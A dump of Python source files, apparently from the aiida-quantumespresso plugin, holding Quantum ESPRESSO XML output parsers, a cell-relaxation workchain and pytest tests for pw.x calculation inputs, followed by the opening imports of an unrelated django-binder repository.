    attrname = 'UNITS'
    parsed_data[tagname.lower()] = parse_xml_child_attribute_str(tagname, attrname, target_tags)
    try:
        # One parallel list per species property, indexed from 1 (QE convention).
        parsed_data['species'] = {}
        parsed_data['species']['index'] = []
        parsed_data['species']['type'] = []
        parsed_data['species']['mass'] = []
        parsed_data['species']['pseudo'] = []
        for i in range(parsed_data['number_of_species']):
            tagname = 'SPECIE.' + str(i + 1)
            parsed_data['species']['index'].append(i + 1)
            #a=target_tags.getElementsByTagName(tagname)[0]
            a = [_ for _ in target_tags.childNodes if _.nodeName == tagname][0]
            tagname2 = 'ATOM_TYPE'
            parsed_data['species']['type'].append(parse_xml_child_str(tagname2, a))
            tagname2 = 'MASS'
            parsed_data['species']['mass'].append(parse_xml_child_float(tagname2, a))
            tagname2 = 'PSEUDO'
            parsed_data['species']['pseudo'].append(parse_xml_child_str(tagname2, a))
        tagname = 'UNITS_FOR_ATOMIC_POSITIONS'
        attrname = 'UNITS'
        parsed_data[tagname.lower()] = parse_xml_child_attribute_str(tagname, attrname, target_tags)
    # NOTE(review): bare except also swallows KeyboardInterrupt/SystemExit.
    except:
        raise QEOutputParsingError('Error parsing tag SPECIE.# inside %s.' % (target_tags.tagName))
    # TODO convert the units
    # if parsed_data['units_for_atomic_positions'] not in ['alat','bohr','angstrom']:
    try:
        atomlist = []
        atoms_index_list = []
        atoms_if_pos_list = []
        tagslist = []
        for i in range(parsed_data['number_of_atoms']):
            tagname = 'ATOM.' + str(i + 1)
            # USELESS AT THE MOMENT, I DON'T SAVE IT
            # parsed_data['atoms']['list_index']=i
            #a=target_tags.getElementsByTagName(tagname)[0]
            a = [_ for _ in target_tags.childNodes if _.nodeName == tagname][0]
            tagname2 = 'INDEX'
            b = int(a.getAttribute(tagname2))
            atoms_index_list.append(b)
            tagname2 = 'SPECIES'
            chem_symbol = str(a.getAttribute(tagname2)).rstrip().replace('\n', '')
            # I check if it is a subspecie (e.g. 'Fe1' -> symbol 'Fe', tag 1)
            chem_symbol_digits = ''.join([i for i in chem_symbol if i in string.digits])
            try:
                tagslist.append(int(chem_symbol_digits))
            except ValueError:
                # If I can't parse the digit, it is probably not there: I add a None to the tagslist
                tagslist.append(None)
            # I remove the symbols
            chem_symbol = ''.join(i for i in chem_symbol if not i.isdigit())
            tagname2 = 'tau'
            b = a.getAttribute(tagname2)
            tau = [float(s) for s in b.rstrip().replace('\n', '').split()]
            metric = parsed_data['units_for_atomic_positions']
            if metric not in ['alat', 'bohr', 'angstrom']:  # REMEMBER TO CONVERT AT THE END
                raise QEOutputParsingError('Error parsing tag %s inside %s' % (tagname, target_tags.tagName))
            # Rescale positions: 'alat' multiplies by the raw lattice parameter,
            # 'bohr' converts to angstrom; 'angstrom' is kept as is.
            if metric == 'alat':
                tau = [parsed_data['lattice_parameter_xml'] * float(s) for s in tau]
            elif metric == 'bohr':
                tau = [CONSTANTS.bohr_to_ang * float(s) for s in tau]
            atomlist.append([chem_symbol, tau])
            tagname2 = 'if_pos'
            b = a.getAttribute(tagname2)
            if_pos = [int(s) for s in b.rstrip().replace('\n', '').split()]
            atoms_if_pos_list.append(if_pos)
        parsed_data['atoms'] = atomlist
        parsed_data['atoms_index_list'] = atoms_index_list
        parsed_data['atoms_if_pos_list'] = atoms_if_pos_list
        cell = {}
        cell['lattice_vectors'] = lattice_vectors
        cell['volume'] = volume
        cell['atoms'] = atomlist
        cell['tagslist'] = tagslist
        parsed_data['cell'] = cell
    except Exception:
        raise QEOutputParsingError('Error parsing tag ATOM.# inside %s.' % (target_tags.tagName))
    # saving data together with cell parameters. Did so for better compatibility with ASE.
    # correct some units that have been converted in
    parsed_data['atomic_positions' + units_suffix] = default_length_units
    parsed_data['direct_lattice_vectors' + units_suffix] = default_length_units
    return parsed_data
def xml_card_spin(parsed_data, dom):
    """Parse the SPIN card of the QE XML output into ``parsed_data``.

    Stores the LSDA, non-colinear and spin-orbit boolean flags under keys
    derived from the tag names (hyphens replaced by underscores, lower case).
    """
    target_tags = read_xml_card(dom, 'SPIN')
    boolean_tags = ('LSDA', 'NON-COLINEAR_CALCULATION', 'SPIN-ORBIT_CALCULATION', 'SPIN-ORBIT_DOMAG')
    for tagname in boolean_tags:
        key = tagname.replace('-', '_').lower()
        parsed_data[key] = parse_xml_child_bool(tagname, target_tags)
    return parsed_data
def xml_card_header(parsed_data, dom):
    """Parse the HEADER card of the QE XML output into ``parsed_data``.

    Stores the NAME and VERSION attributes of the FORMAT and CREATOR tags
    under keys such as ``format_name`` and ``creator_version``.
    """
    target_tags = read_xml_card(dom, 'HEADER')
    for tagname in ('FORMAT', 'CREATOR'):
        for attrname in ('NAME', 'VERSION'):
            key = '{}_{}'.format(tagname, attrname).lower()
            parsed_data[key] = parse_xml_child_attribute_str(tagname, attrname, target_tags)
    return parsed_data
def xml_card_planewaves(parsed_data, dom, calctype):
    """Parse the PLANE_WAVES card of the QE XML output.

    Stores the wavefunction and charge-density cutoffs (converted to eV) and
    the FFT grids; for 'cp' calculations also the G-vector counters, the
    gamma-only flag and the small-box FFT grid.

    :param parsed_data: dictionary updated in place with the parsed values
    :param dom: XML DOM of the QE output file
    :param calctype: either 'pw' or 'cp'
    :return: the updated ``parsed_data`` dictionary
    :raises ValueError: if ``calctype`` is neither 'pw' nor 'cp'
    :raises QEOutputParsingError: if the cutoff units are neither hartree nor rydberg
    """
    if calctype not in ['pw', 'cp']:
        raise ValueError("Input flag not accepted, must be 'cp' or 'pw'")
    cardname = 'PLANE_WAVES'
    target_tags = read_xml_card(dom, cardname)
    tagname = 'UNITS_FOR_CUTOFF'
    attrname = 'UNITS'
    units = parse_xml_child_attribute_str(tagname, attrname, target_tags).lower()
    # BUGFIX: the previous nested if/else left `conv_fac` unassigned when the
    # units were rydberg (the else branch only ever handled hartree), causing
    # a NameError when the cutoffs were converted below. Select the conversion
    # factor explicitly and raise only for genuinely unsupported units.
    if 'hartree' in units:
        conv_fac = CONSTANTS.hartree_to_ev
    elif 'rydberg' in units:
        conv_fac = CONSTANTS.ry_to_ev
    else:
        raise QEOutputParsingError('Units {} are not supported by parser'.format(units))
    # Cutoffs, converted to eV.
    tagname = 'WFC_CUTOFF'
    parsed_data[tagname.lower()] = parse_xml_child_float(tagname, target_tags) * conv_fac
    parsed_data[tagname.lower() + units_suffix] = default_energy_units
    tagname = 'RHO_CUTOFF'
    parsed_data[tagname.lower()] = parse_xml_child_float(tagname, target_tags) * conv_fac
    parsed_data[tagname.lower() + units_suffix] = default_energy_units
    # FFT grids: the smooth grid attributes carry an extra trailing 's'.
    for tagname in ['FFT_GRID', 'SMOOTH_FFT_GRID']:
        grid = []
        for attrname in ['nr1', 'nr2', 'nr3']:
            if 'SMOOTH' in tagname:
                attrname += 's'
            grid.append(parse_xml_child_attribute_int(tagname, attrname, target_tags))
        parsed_data[tagname.lower()] = grid
    if calctype == 'cp':
        # Extra tags only written by cp.x outputs.
        for tagname in ['MAX_NUMBER_OF_GK-VECTORS', 'GVECT_NUMBER', 'SMOOTH_GVECT_NUMBER']:
            parsed_data[tagname.lower()] = parse_xml_child_integer(tagname, target_tags)
        tagname = 'GAMMA_ONLY'
        parsed_data[tagname.lower()] = parse_xml_child_bool(tagname, target_tags)
        tagname = 'SMALLBOX_FFT_GRID'
        fft_grid = []
        for attrname in ['nr1b', 'nr2b', 'nr3b']:
            fft_grid.append(parse_xml_child_attribute_int(tagname, attrname, target_tags))
        parsed_data[tagname.lower()] = fft_grid
    return parsed_data
def xml_card_symmetries(parsed_data, dom):
    """Parse the SYMMETRIES card of the QE XML output.

    Stores the symmetry counters and boolean flags, then one dict per SYMM.#
    tag with the symmetry name, its 3x3 rotation matrix (crystal units) and,
    when present, the time-reversal flag, fractional translation and
    equivalent-ions mapping.

    :param parsed_data: dictionary updated in place with the parsed values
    :param dom: XML DOM of the QE output file
    :return: the updated ``parsed_data`` dictionary
    :raises QEOutputParsingError: on missing tags or unsupported units
    """
    cardname = 'SYMMETRIES'
    target_tags = read_xml_card(dom, cardname)
    for tagname in ['NUMBER_OF_SYMMETRIES', 'NUMBER_OF_BRAVAIS_SYMMETRIES']:
        parsed_data[tagname.replace('-','_').lower()] = \
            parse_xml_child_integer(tagname,target_tags)
    for tagname in ['INVERSION_SYMMETRY', 'DO_NOT_USE_TIME_REVERSAL', 'TIME_REVERSAL_FLAG', 'NO_TIME_REV_OPERATIONS']:
        parsed_data[tagname.lower()] = parse_xml_child_bool(tagname, target_tags)
    tagname = 'UNITS_FOR_SYMMETRIES'
    attrname = 'UNITS'
    metric = parse_xml_child_attribute_str(tagname, attrname, target_tags)
    if metric not in ['crystal']:
        raise QEOutputParsingError('Error parsing attribute {},'.format(attrname) + \
                                   ' tag {} inside '.format(tagname) + \
                                   '{}, units unknown'.format(target_tags.tagName ) )
    parsed_data['symmetries' + units_suffix] = metric
    # parse the symmetry matrices
    parsed_data['symmetries'] = []
    find_sym = True
    i = 0
    # SYMM.# tags are numbered consecutively from 1; keep reading until the
    # missing index raises IndexError, which terminates the loop.
    while find_sym:
        try:
            i += 1
            current_sym = {}
            tagname = 'SYMM.' + str(i)
            #a=target_tags.getElementsByTagName(tagname)[0]
            a = [_ for _ in target_tags.childNodes if _.nodeName == tagname][0]
            tagname2 = 'INFO'
            b = a.getElementsByTagName(tagname2)[0]
            attrname = 'NAME'
            value = str(b.getAttribute(attrname)).rstrip().replace('\n', '')
            current_sym['name'] = value
            try:
                # T_REV attribute is optional.
                attrname = 'T_REV'
                value = str(b.getAttribute(attrname)).rstrip().replace('\n', '')
                current_sym[attrname.lower()] = value
            except Exception:
                pass
            tagname2 = 'ROTATION'
            b = a.getElementsByTagName(tagname2)[0]
            c = [int(s) for s in b.childNodes[0].data.split()]
            current_sym[tagname2.lower()] = convert_list_to_matrix(c, 3, 3)
            for tagname2 in ['FRACTIONAL_TRANSLATION', 'EQUIVALENT_IONS']:  # not always present
                try:
                    b = a.getElementsByTagName(tagname2)[0]
                    if tagname2 == 'FRACTIONAL_TRANSLATION':
                        value = [float(s) for s in b.childNodes[0].data.split()]
                    else:
                        value = [int(s) for s in b.childNodes[0].data.split()]
                    current_sym[tagname2.lower()] = value
                except Exception:
                    # Re-raise: if one of these optional tags is present but
                    # malformed, the error must propagate (including the
                    # IndexError that ends the outer while loop).
                    raise
            parsed_data['symmetries'].append(current_sym)
        except IndexError:  # SYMM.i out of index
            find_sym = False
    return parsed_data
def xml_card_exchangecorrelation(parsed_data, dom):
    """Parse the EXCHANGE_CORRELATION card of the QE XML output.

    Stores the DFT functional name and, for LDA+U calculations, the Hubbard
    parameters (energies converted from Ry to eV). Optional van der Waals
    tags are parsed when present and silently skipped otherwise.

    :param parsed_data: dictionary updated in place with the parsed values
    :param dom: XML DOM of the QE output file
    :return: the updated ``parsed_data`` dictionary
    :raises QEOutputParsingError: if a required Hubbard tag cannot be parsed
    """
    cardname = 'EXCHANGE_CORRELATION'
    target_tags = read_xml_card(dom, cardname)
    tagname = 'DFT'
    parsed_data[(tagname+'_exchange_correlation').lower()] = \
        parse_xml_child_str(tagname,target_tags)
    tagname = 'LDA_PLUS_U_CALCULATION'
    try:
        parsed_data[tagname.lower()] = parse_xml_child_bool(tagname, target_tags)
    except Exception:
        # Tag absent: treat as not an LDA+U calculation.
        parsed_data[tagname.lower()] = False
    if parsed_data[tagname.lower()]:  # if it is a plus U calculation, I expect more infos
        tagname = 'HUBBARD_L'
        try:
            #a = target_tags.getElementsByTagName(tagname)[0]
            a = [_ for _ in target_tags.childNodes if _.nodeName == tagname][0]
            b = a.childNodes[0]
            c = b.data.replace('\n', '').split()
            value = [int(i) for i in c]
            parsed_data[tagname.lower()] = value
        except Exception:
            raise QEOutputParsingError('Error parsing tag '+\
                                       '{} inside {}.'.format(tagname, target_tags.tagName) )
        for tagname in ['HUBBARD_U', 'HUBBARD_ALPHA', 'HUBBARD_BETA', 'HUBBARD_J0']:
            try:
                #a = target_tags.getElementsByTagName(tagname)[0]
                a = [_ for _ in target_tags.childNodes if _.nodeName == tagname][0]
                b = a.childNodes[0]
                c = b.data.replace('\n', ' ').split()  # note the need of a white space!
                # Hubbard energies are written in Ry; store them in eV.
                value = [float(i) * CONSTANTS.ry_to_ev for i in c]
                parsed_data[tagname.lower()] = value
            except Exception:
                raise QEOutputParsingError('Error parsing tag '+\
                                           '{} inside {}.'.format(tagname, target_tags.tagName))
        tagname = 'LDA_PLUS_U_KIND'
        try:
            parsed_data[tagname.lower()] = parse_xml_child_integer(tagname, target_tags)
        except Exception:
            pass
        tagname = 'U_PROJECTION_TYPE'
        try:
            parsed_data[tagname.lower()] = parse_xml_child_str(tagname, target_tags)
        except Exception:
            pass
        tagname = 'HUBBARD_J'
        try:
            #a=target_tags.getElementsByTagName(tagname)[0]
            a = [_ for _ in target_tags.childNodes if _.nodeName == tagname][0]
            b = a.childNodes[0]
            c = b.data.replace('\n', '').split()
            parsed_data[tagname.lower()] = convert_list_to_matrix(c, 3, 3)
        except Exception:
            pass
    try:
        tagname = 'NON_LOCAL_DF'
        parsed_data[tagname.lower()] = parse_xml_child_integer(tagname, target_tags)
    except Exception:
        pass
    try:
        tagname = 'VDW_KERNEL_NAME'
        parsed_data[tagname.lower()] = parse_xml_child_str(tagname, target_tags)
    except Exception:
        pass
    return parsed_data
--- FILE SEPARATOR ---
# -*- coding: utf-8 -*-
"""Workchain to relax a structure using Quantum ESPRESSO pw.x."""
from aiida import orm
from aiida.common import AttributeDict, exceptions
from aiida.engine import WorkChain, ToContext, if_, while_, append_
from aiida.plugins import CalculationFactory, WorkflowFactory
from aiida_quantumespresso.utils.mapping import prepare_process_inputs
PwCalculation = CalculationFactory('quantumespresso.pw')
PwBaseWorkChain = WorkflowFactory('quantumespresso.pw.base')
class PwRelaxWorkChain(WorkChain):
    """Workchain to relax a structure using Quantum ESPRESSO pw.x.

    The relaxation is wrapped in a meta-convergence loop: the relax
    `PwBaseWorkChain` is re-run on its own output structure until the relative
    cell volume change between two consecutive iterations drops below the
    `volume_convergence` threshold (or `meta_convergence` is disabled), after
    which an optional final SCF can be run on the relaxed structure.
    """

    @classmethod
    def define(cls, spec):
        """Define the process specification."""
        # yapf: disable
        super().define(spec)
        spec.expose_inputs(PwBaseWorkChain, namespace='base',
            exclude=('clean_workdir', 'pw.structure', 'pw.parent_folder'),
            namespace_options={'help': 'Inputs for the `PwBaseWorkChain`.'})
        spec.input('structure', valid_type=orm.StructureData, help='The inputs structure.')
        spec.input('final_scf', valid_type=orm.Bool, default=lambda: orm.Bool(False),
            help='If `True`, a final SCF calculation will be performed on the successfully relaxed structure.')
        spec.input('relaxation_scheme', valid_type=orm.Str, default=lambda: orm.Str('vc-relax'),
            help='The relaxation scheme to use: choose either `relax` or `vc-relax` for variable cell relax.')
        spec.input('meta_convergence', valid_type=orm.Bool, default=lambda: orm.Bool(True),
            help='If `True` the workchain will perform a meta-convergence on the cell volume.')
        spec.input('max_meta_convergence_iterations', valid_type=orm.Int, default=lambda: orm.Int(5),
            help='The maximum number of variable cell relax iterations in the meta convergence cycle.')
        spec.input('volume_convergence', valid_type=orm.Float, default=lambda: orm.Float(0.01),
            help='The volume difference threshold between two consecutive meta convergence iterations.')
        spec.input('clean_workdir', valid_type=orm.Bool, default=lambda: orm.Bool(False),
            help='If `True`, work directories of all called calculation will be cleaned at the end of execution.')
        spec.outline(
            cls.setup,
            while_(cls.should_run_relax)(
                cls.run_relax,
                cls.inspect_relax,
            ),
            if_(cls.should_run_final_scf)(
                cls.run_final_scf,
                cls.inspect_final_scf,
            ),
            cls.results,
        )
        spec.exit_code(401, 'ERROR_SUB_PROCESS_FAILED_RELAX',
            message='the relax PwBaseWorkChain sub process failed')
        spec.exit_code(402, 'ERROR_SUB_PROCESS_FAILED_FINAL_SCF',
            message='the final scf PwBaseWorkChain sub process failed')
        spec.expose_outputs(PwBaseWorkChain, exclude=('output_structure',))
        spec.output('output_structure', valid_type=orm.StructureData, required=True,
            help='The successfully relaxed structure.')

    def setup(self):
        """Input validation and context setup."""
        # Context variables used by the meta-convergence loop below.
        self.ctx.current_number_of_bands = None
        self.ctx.current_structure = self.inputs.structure
        self.ctx.current_cell_volume = None
        self.ctx.is_converged = False
        self.ctx.iteration = 0

    def should_run_relax(self):
        """Return whether a relaxation workchain should be run.

        This is the case as long as the volume change between two consecutive relaxation runs is larger than the volume
        convergence threshold value and the maximum number of meta convergence iterations is not exceeded.
        """
        return not self.ctx.is_converged and self.ctx.iteration < self.inputs.max_meta_convergence_iterations.value

    def should_run_final_scf(self):
        """Return whether after successful relaxation a final scf calculation should be run.

        If the maximum number of meta convergence iterations has been exceeded and convergence has not been reached, the
        structure cannot be considered to be relaxed and the final scf should not be run.
        """
        return self.inputs.final_scf.value and self.ctx.is_converged

    def run_relax(self):
        """Run the `PwBaseWorkChain` to run a relax `PwCalculation`."""
        self.ctx.iteration += 1

        inputs = AttributeDict(self.exposed_inputs(PwBaseWorkChain, namespace='base'))
        inputs.pw.structure = self.ctx.current_structure
        inputs.pw.parameters = inputs.pw.parameters.get_dict()
        inputs.pw.parameters.setdefault('CONTROL', {})
        inputs.pw.parameters['CONTROL']['calculation'] = self.inputs.relaxation_scheme.value
        inputs.pw.parameters['CONTROL']['restart_mode'] = 'from_scratch'

        # If one of the nested `PwBaseWorkChains` changed the number of bands, apply it here
        if self.ctx.current_number_of_bands is not None:
            inputs.pw.parameters.setdefault('SYSTEM', {})['nbnd'] = self.ctx.current_number_of_bands

        # Set the `CALL` link label
        inputs.metadata.call_link_label = 'iteration_{:02d}'.format(self.ctx.iteration)

        inputs = prepare_process_inputs(PwBaseWorkChain, inputs)
        running = self.submit(PwBaseWorkChain, **inputs)

        self.report('launching PwBaseWorkChain<{}>'.format(running.pk))

        return ToContext(workchains=append_(running))

    def inspect_relax(self):
        """Inspect the results of the last `PwBaseWorkChain`.

        Compare the cell volume of the relaxed structure of the last completed workchain with the previous. If the
        difference ratio is less than the volume convergence threshold we consider the cell relaxation converged.
        """
        workchain = self.ctx.workchains[-1]

        # This exit status means a usable relaxed structure exists even though
        # the sub process is formally failed, so it is tolerated below.
        acceptable_statuses = [
            'ERROR_IONIC_CONVERGENCE_REACHED_EXCEPT_IN_FINAL_SCF'
        ]

        if workchain.is_excepted or workchain.is_killed:
            self.report('relax PwBaseWorkChain was excepted or killed')
            return self.exit_codes.ERROR_SUB_PROCESS_FAILED_RELAX

        if workchain.is_failed and workchain.exit_status not in PwBaseWorkChain.get_exit_statuses(acceptable_statuses):
            self.report('relax PwBaseWorkChain failed with exit status {}'.format(workchain.exit_status))
            return self.exit_codes.ERROR_SUB_PROCESS_FAILED_RELAX

        try:
            structure = workchain.outputs.output_structure
        except exceptions.NotExistent:
            self.report('relax PwBaseWorkChain finished successful but without output structure')
            return self.exit_codes.ERROR_SUB_PROCESS_FAILED_RELAX

        prev_cell_volume = self.ctx.current_cell_volume
        curr_cell_volume = structure.get_cell_volume()

        # Set relaxed structure as input structure for next iteration
        self.ctx.current_structure = structure
        self.ctx.current_number_of_bands = workchain.outputs.output_parameters.get_dict()['number_of_bands']
        self.report('after iteration {} cell volume of relaxed structure is {}'
            .format(self.ctx.iteration, curr_cell_volume))

        # After first iteration, simply set the cell volume and restart the next base workchain
        if not prev_cell_volume:
            self.ctx.current_cell_volume = curr_cell_volume

            # If meta convergence is switched off we are done
            if not self.inputs.meta_convergence.value:
                self.ctx.is_converged = True
            return

        # Check whether the cell volume is converged
        volume_threshold = self.inputs.volume_convergence.value
        volume_difference = abs(prev_cell_volume - curr_cell_volume) / prev_cell_volume

        if volume_difference < volume_threshold:
            self.ctx.is_converged = True
            self.report('relative cell volume difference {} smaller than convergence threshold {}'
                .format(volume_difference, volume_threshold))
        else:
            self.report('current relative cell volume difference {} larger than convergence threshold {}'
                .format(volume_difference, volume_threshold))

        self.ctx.current_cell_volume = curr_cell_volume

        return

    def run_final_scf(self):
        """Run the `PwBaseWorkChain` to run a final scf `PwCalculation` for the relaxed structure."""
        inputs = AttributeDict(self.exposed_inputs(PwBaseWorkChain, namespace='base'))
        inputs.pw.structure = self.ctx.current_structure
        inputs.pw.parameters = inputs.pw.parameters.get_dict()

        inputs.pw.parameters.setdefault('CONTROL', {})
        inputs.pw.parameters['CONTROL']['calculation'] = 'scf'
        inputs.pw.parameters['CONTROL']['restart_mode'] = 'from_scratch'
        # The CELL namelist only applies to variable-cell runs; drop it for the scf.
        inputs.pw.parameters.pop('CELL', None)
        inputs.metadata.call_link_label = 'final_scf'

        if self.ctx.current_number_of_bands is not None:
            inputs.pw.parameters.setdefault('SYSTEM', {})['nbnd'] = self.ctx.current_number_of_bands

        inputs = prepare_process_inputs(PwBaseWorkChain, inputs)
        running = self.submit(PwBaseWorkChain, **inputs)

        self.report('launching PwBaseWorkChain<{}> for final scf'.format(running.pk))

        return ToContext(workchain_scf=running)

    def inspect_final_scf(self):
        """Inspect the result of the final scf `PwBaseWorkChain`."""
        workchain = self.ctx.workchain_scf

        if not workchain.is_finished_ok:
            self.report('final scf PwBaseWorkChain failed with exit status {}'.format(workchain.exit_status))
            return self.exit_codes.ERROR_SUB_PROCESS_FAILED_FINAL_SCF

    def results(self):
        """Attach the output parameters and structure of the last workchain to the outputs."""
        if self.ctx.is_converged and self.ctx.iteration <= self.inputs.max_meta_convergence_iterations.value:
            self.report('workchain completed after {} iterations'.format(self.ctx.iteration))
        else:
            self.report('maximum number of meta convergence iterations exceeded')

        # Get the latest workchain, which is either the workchain_scf if it ran or otherwise the last regular workchain
        try:
            workchain = self.ctx.workchain_scf
            # Double underscore addresses the `pw.structure` input in the flattened namespace.
            structure = workchain.inputs.pw__structure
        except AttributeError:
            workchain = self.ctx.workchains[-1]
            structure = workchain.outputs.output_structure

        self.out_many(self.exposed_outputs(workchain, PwBaseWorkChain))
        self.out('output_structure', structure)

    def on_terminated(self):
        """Clean the working directories of all child calculations if `clean_workdir=True` in the inputs."""
        super().on_terminated()

        if self.inputs.clean_workdir.value is False:
            self.report('remote folders will not be cleaned')
            return

        cleaned_calcs = []

        for called_descendant in self.node.called_descendants:
            if isinstance(called_descendant, orm.CalcJobNode):
                try:
                    called_descendant.outputs.remote_folder._clean()  # pylint: disable=protected-access
                    cleaned_calcs.append(called_descendant.pk)
                except (IOError, OSError, KeyError):
                    # Best effort: a missing or already-cleaned folder is not an error.
                    pass

        if cleaned_calcs:
            self.report('cleaned remote folders of calculations: {}'.format(' '.join(map(str, cleaned_calcs))))
--- FILE SEPARATOR ---
# -*- coding: utf-8 -*-
"""Tests for the `PwCalculation` class."""
import pytest
from aiida import orm
from aiida.common import datastructures
from aiida_quantumespresso.utils.resources import get_default_options
from aiida_quantumespresso.calculations.helpers import QEInputValidationError
def test_pw_default(fixture_sandbox, generate_calc_job, generate_inputs_pw, file_regression):
    """Test a default `PwCalculation`.

    Checks the attributes of the returned `CalcInfo` (command line parameters,
    copy and retrieve lists) and compares the generated input file against the
    stored file-regression reference.
    """
    entry_point_name = 'quantumespresso.pw'

    inputs = generate_inputs_pw()
    calc_info = generate_calc_job(fixture_sandbox, entry_point_name, inputs)

    upf = inputs['pseudos']['Si']
    # Expected values for the `CalcInfo` attributes.
    cmdline_params = ['-in', 'aiida.in']
    local_copy_list = [(upf.uuid, upf.filename, './pseudo/Si.upf')]
    retrieve_list = ['aiida.out', './out/aiida.save/data-file-schema.xml', './out/aiida.save/data-file.xml']
    retrieve_temporary_list = [['./out/aiida.save/K*[0-9]/eigenval*.xml', '.', 2]]

    # Check the attributes of the returned `CalcInfo`
    assert isinstance(calc_info, datastructures.CalcInfo)
    assert sorted(calc_info.cmdline_params) == sorted(cmdline_params)
    assert sorted(calc_info.local_copy_list) == sorted(local_copy_list)
    assert sorted(calc_info.retrieve_list) == sorted(retrieve_list)
    assert sorted(calc_info.retrieve_temporary_list) == sorted(retrieve_temporary_list)
    assert sorted(calc_info.remote_symlink_list) == sorted([])

    with fixture_sandbox.open('aiida.in') as handle:
        input_written = handle.read()

    # Checks on the files written to the sandbox folder as raw input
    assert sorted(fixture_sandbox.get_content_list()) == sorted(['aiida.in', 'pseudo', 'out'])
    file_regression.check(input_written, encoding='utf-8', extension='.in')
def test_pw_ibrav(
    fixture_sandbox, generate_calc_job, fixture_code, generate_kpoints_mesh, generate_upf_data, file_regression
):
    """Test a `PwCalculation` where `ibrav` is explicitly specified.

    With a non-zero `ibrav` the plugin validates that the structure cell
    matches the QE convention for that Bravais lattice, so the cell below is
    given in the rotated form QE uses for ibrav=2 (fcc).
    """
    entry_point_name = 'quantumespresso.pw'

    parameters = {'CONTROL': {'calculation': 'scf'}, 'SYSTEM': {'ecutrho': 240.0, 'ecutwfc': 30.0, 'ibrav': 2}}

    # The structure needs to be rotated in the same way QE does it for ibrav=2.
    param = 5.43
    cell = [[-param / 2., 0, param / 2.], [0, param / 2., param / 2.], [-param / 2., param / 2., 0]]
    structure = orm.StructureData(cell=cell)
    structure.append_atom(position=(0., 0., 0.), symbols='Si', name='Si')
    structure.append_atom(position=(param / 4., param / 4., param / 4.), symbols='Si', name='Si')

    upf = generate_upf_data('Si')
    inputs = {
        'code': fixture_code(entry_point_name),
        'structure': structure,
        'kpoints': generate_kpoints_mesh(2),
        'parameters': orm.Dict(dict=parameters),
        'pseudos': {
            'Si': upf
        },
        'metadata': {
            'options': get_default_options()
        }
    }

    calc_info = generate_calc_job(fixture_sandbox, entry_point_name, inputs)

    # Expected values for the `CalcInfo` attributes.
    cmdline_params = ['-in', 'aiida.in']
    local_copy_list = [(upf.uuid, upf.filename, u'./pseudo/Si.upf')]
    retrieve_list = ['aiida.out', './out/aiida.save/data-file-schema.xml', './out/aiida.save/data-file.xml']
    retrieve_temporary_list = [['./out/aiida.save/K*[0-9]/eigenval*.xml', '.', 2]]

    # Check the attributes of the returned `CalcInfo`
    assert isinstance(calc_info, datastructures.CalcInfo)
    assert sorted(calc_info.cmdline_params) == sorted(cmdline_params)
    assert sorted(calc_info.local_copy_list) == sorted(local_copy_list)
    assert sorted(calc_info.retrieve_list) == sorted(retrieve_list)
    assert sorted(calc_info.retrieve_temporary_list) == sorted(retrieve_temporary_list)
    assert sorted(calc_info.remote_symlink_list) == sorted([])

    with fixture_sandbox.open('aiida.in') as handle:
        input_written = handle.read()

    # Checks on the files written to the sandbox folder as raw input
    assert sorted(fixture_sandbox.get_content_list()) == sorted(['aiida.in', 'pseudo', 'out'])
    file_regression.check(input_written, encoding='utf-8', extension='.in')
def test_pw_wrong_ibrav(fixture_sandbox, generate_calc_job, fixture_code, generate_kpoints_mesh, generate_upf_data):
    """Test that a `PwCalculation` with an incorrect `ibrav` raises."""
    entry_point_name = 'quantumespresso.pw'
    parameters = {'CONTROL': {'calculation': 'scf'}, 'SYSTEM': {'ecutrho': 240.0, 'ecutwfc': 30.0, 'ibrav': 2}}

    # Deliberately use a wrong ordering of the unit cell vectors, so the cell
    # does not match the convention QE expects for ibrav=2.
    param = 5.43
    half = param / 2.
    structure = orm.StructureData(cell=[[0, half, half], [-half, 0, half], [-half, half, 0]])
    for position in [(0., 0., 0.), (param / 4., param / 4., param / 4.)]:
        structure.append_atom(position=position, symbols='Si', name='Si')

    inputs = {
        'code': fixture_code(entry_point_name),
        'structure': structure,
        'kpoints': generate_kpoints_mesh(2),
        'parameters': orm.Dict(dict=parameters),
        'pseudos': {'Si': generate_upf_data('Si')},
        'metadata': {'options': get_default_options()},
    }

    # The cell/ibrav consistency check must reject these inputs.
    with pytest.raises(QEInputValidationError):
        generate_calc_job(fixture_sandbox, entry_point_name, inputs)
def test_pw_ibrav_tol(fixture_sandbox, generate_calc_job, fixture_code, generate_kpoints_mesh, generate_upf_data):
    """Test that `IBRAV_TOLERANCE` controls the tolerance when checking cell consistency.

    A cell perturbed by ``eps`` away from the exact ibrav=2 form must fail the
    default consistency check but pass once `ibrav_cell_tolerance` is raised.
    """
    entry_point_name = 'quantumespresso.pw'
    parameters = {'CONTROL': {'calculation': 'scf'}, 'SYSTEM': {'ecutrho': 240.0, 'ecutwfc': 30.0, 'ibrav': 2}}
    # The structure needs to be rotated in the same way QE does it for ibrav=2.
    param = 5.43
    eps = 0.1
    cell = [[-param / 2., eps, param / 2.], [-eps, param / 2. + eps, param / 2.], [-param / 2., param / 2., 0]]
    structure = orm.StructureData(cell=cell)
    structure.append_atom(position=(0., 0., 0.), symbols='Si', name='Si')
    structure.append_atom(position=(param / 4., param / 4., param / 4.), symbols='Si', name='Si')
    upf = generate_upf_data('Si')
    inputs = {
        'code': fixture_code(entry_point_name),
        'structure': structure,
        'kpoints': generate_kpoints_mesh(2),
        'parameters': orm.Dict(dict=parameters),
        'pseudos': {
            'Si': upf
        },
        'metadata': {
            'options': get_default_options()
        },
    }

    # Without adjusting the tolerance, the check fails.
    with pytest.raises(QEInputValidationError):
        generate_calc_job(fixture_sandbox, entry_point_name, inputs)

    # After adjusting the tolerance, the input validation no longer fails.
    inputs['settings'] = orm.Dict(dict={'ibrav_cell_tolerance': eps})
    generate_calc_job(fixture_sandbox, entry_point_name, inputs)
|
[
"/aiida_quantumespresso/calculations/cp.py",
"/aiida_quantumespresso/cli/workflows/pw/bands.py",
"/aiida_quantumespresso/cli/workflows/pw/relax.py",
"/aiida_quantumespresso/parsers/__init__.py",
"/aiida_quantumespresso/parsers/cp.py",
"/aiida_quantumespresso/parsers/parse_xml/pw/legacy.py",
"/aiida_quantumespresso/workflows/pw/relax.py",
"/tests/calculations/test_pw.py"
] |
00mjk/django-binder
|
import re
import warnings
from collections import defaultdict
from datetime import date, datetime, time
from contextlib import suppress
from django.db import models
from django.contrib.postgres.fields import CITextField, ArrayField, JSONField
from django.db.models import signals
from django.core.exceptions import ValidationError
from django.db.models.query_utils import Q
from django.utils import timezone
